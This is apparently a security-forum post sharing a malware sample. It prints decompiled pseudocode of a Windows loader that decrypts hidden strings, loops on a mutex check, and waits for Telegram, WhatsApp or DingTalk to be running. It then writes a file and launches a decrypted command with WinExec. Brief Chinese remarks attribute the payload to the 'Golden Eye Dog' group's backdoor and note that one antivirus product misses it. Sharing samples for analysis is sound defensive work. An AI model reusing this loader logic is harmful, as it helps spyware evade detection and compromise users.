v4 = (void **)sub_10007E62(v34, v35);
v5 = v4;
v76 = 0;
if ( (unsigned int)v4[5] > 0xF )
v5 = *v4;
sub_10004C73(v48, 26);
LOBYTE(v76) = 1;
v6 = unknown_libname_7(v5);
sub_1000395D(v6);
v7 = 1024;
sub_10003EAC(v48);
LOBYTE(v76) = 4;
sub_10003EAC(v50);
v60[0] = -1485775190;
v60[1] = 1982937532;
v60[2] = 1551876189;
strcpy(v61, "8笔?I");
v61[6] = 0;
sub_10002DC5(v60, &v61[7], &v34);
v8 = (_DWORD *)sub_10007E62(v34, v35);
LOBYTE(v76) = 5;
if ( v8[5] > 0xFu )
v8 = (_DWORD *)*v8;
sub_100042BA(FileName, Src, v8);
LOBYTE(v76) = 7;
for ( i = (LPCSTR *)&v45; ; i = lpCmdLine )
{
sub_10003EAC(i);
do
{
while ( 1 )
{
Sleep(0x4E20u);
v10 = OpenMutexA(0x100000u, 0, "NYIRNWRG");
if ( !v10 )
break;
CloseHandle(v10);
Sleep(0x3E8u);
}
qmemcpy(v67, "Telegram.exe", sizeof(v67));
sub_10002DC5(v67, &v68, v67);
LOBYTE(v76) = 8;
v11 = v7 | 1;
v74 = v11;
v12 = sub_10004BF4(v57, v69);
v76 = 9;
v13 = v11 | 2;
v75 = v13;
v74 = v13;
if ( (unsigned __int8)sub_100023D7(v12) )
goto LABEL_14;
qmemcpy(v66, "telegram.exe", sizeof(v66));
sub_10002DC5(v66, v67, v66);
v76 = 10;
v14 = v13 | 4;
v74 = v14;
v15 = sub_10004BF4(v62, v49);
v76 = 11;
v16 = v14 | 8;
v75 = v16;
v74 = v16;
if ( (unsigned __int8)sub_100023D7(v15) )
goto LABEL_14;
qmemcpy(v65, "WhatsApp.exe", sizeof(v65));
sub_10002DC5(v65, v66, v65);
v76 = 12;
v17 = v16 | 0x10;
v74 = v17;
v18 = sub_10004BF4(lpCmdLine, v51);
v76 = 13;
v19 = v17 | 0x20;
v75 = v19;
v74 = v19;
if ( (unsigned __int8)sub_100023D7(v18) )
goto LABEL_14;
qmemcpy(v64, "DingTalk.exe", sizeof(v64));
sub_10002DC5(v64, v65, v64);
v76 = 14;
v20 = v19 | 0x40;
v74 = v20;
v21 = sub_10004BF4(v47, v52);
v75 = v20 | 0x80;
if ( (unsigned __int8)sub_100023D7(v21) || (v22 = sub_1000245A(FileName), v73 = 0, v22) )
LABEL_14:
v73 = 1;
v23 = v75;
if ( (v75 & 0x80u) != 0 )
{
v75 &= ~0x80u;
sub_10003EAC(v47);
v23 = v75;
}
if ( (v23 & 0x40) != 0 )
{
v75 = v23 & 0xFFFFFFBF;
sub_10002DA2(v52);
v23 = v75;
}
if ( (v23 & 0x20) != 0 )
{
v75 = v23 & 0xFFFFFFDF;
sub_10003EAC(lpCmdLine);
v23 = v75;
}
if ( (v23 & 0x10) != 0 )
{
v75 = v23 & 0xFFFFFFEF;
sub_10002DA2(v51);
v23 = v75;
}
if ( (v23 & 8) != 0 )
{
v75 = v23 & 0xFFFFFFF7;
sub_10003EAC(v62);
v23 = v75;
}
if ( (v23 & 4) != 0 )
{
v75 = v23 & 0xFFFFFFFB;
sub_10002DA2(v49);
v23 = v75;
}
if ( (v23 & 2) != 0 )
{
v75 = v23 & 0xFFFFFFFD;
sub_10003EAC(v57);
v23 = v75;
}
v76 = 7;
if ( (v23 & 1) != 0 )
{
v75 = v23 & 0xFFFFFFFE;
sub_10002DA2(v69);
}
v7 = v75;
}
while ( !v73 );
if ( !(unsigned __int8)sub_1000245A(FileName) )
{
sub_10003825(FileName, 2, v24, v24);
LOBYTE(v76) = 15;
if ( v41 && !sub_10003D20(v40) )
sub_10004061(*(_DWORD *)&v40[*(_DWORD *)(v39 + 4) + 8] | 2, 0);
LOBYTE(v76) = 7;
sub_100037E2(v42);
sub_10003880((struct std::ios_base *)v42);
}
Sleep(0x3E8u);
v57[0] = 1963241086;
v57[1] = -845664137;
v57[2] = 327611420;
v57[3] = -417956722;
v57[4] = 1676103246;
v58 = 0;
sub_10002DC5(v57, v59, &v34);
v25 = (void **)sub_10007E62(v34, v35);
v26 = v25;
LOBYTE(v76) = 16;
if ( (unsigned int)v25[5] > 0xF )
v26 = *v25;
v62[0] = 974435932;
v62[1] = -790940150;
v62[2] = 562558479;
v62[3] = -1391838307;
strcpy(v63, "GZ馬鏲");
v63[7] = 0;
sub_10002DC5(v62, v64, &v34);
v27 = sub_10007E62(v34, v35);
v28 = (char *)v27;
LOBYTE(v76) = 17;
if ( *(_DWORD *)(v27 + 20) > 0xFu )
v28 = *(char **)v27;
v29 = strlen(v28);
if ( 0x7FFFFFFF - v55 < v29 )
sub_10001996();
v36 = v55;
v30 = Src;
if ( v56 > 0xF )
v30 = (void **)Src[0];
sub_10004797(v47, v74, v29, v28, v29, v30, v36);
v31 = v75 | 0x200;
LOBYTE(v76) = 18;
v32 = unknown_libname_7(v26);
sub_1000395D(v32);
v7 = v31 | 0x100;
sub_10003EAC(v47);
sub_10003EAC(v44);
LOBYTE(v76) = 7;
sub_10003EAC(v43);
v33 = (const CHAR *)lpCmdLine;
v36 = 0;
if ( lpCmdLine[5] > (LPCSTR)0xF )
v33 = lpCmdLine[0];
WinExec(v33, v36);
}
}

复制代码

实际载荷：
金眼狗自写后门。
实际载荷火绒没有查杀。

[病毒样本] 未知Spyware #FakeAPP 1X

本帖子中包含更多资源

本帖子中包含更多资源

本帖子中包含更多资源

本帖子中包含更多资源

本帖子中包含更多资源

评分

本帖子中包含更多资源

浏览过的版块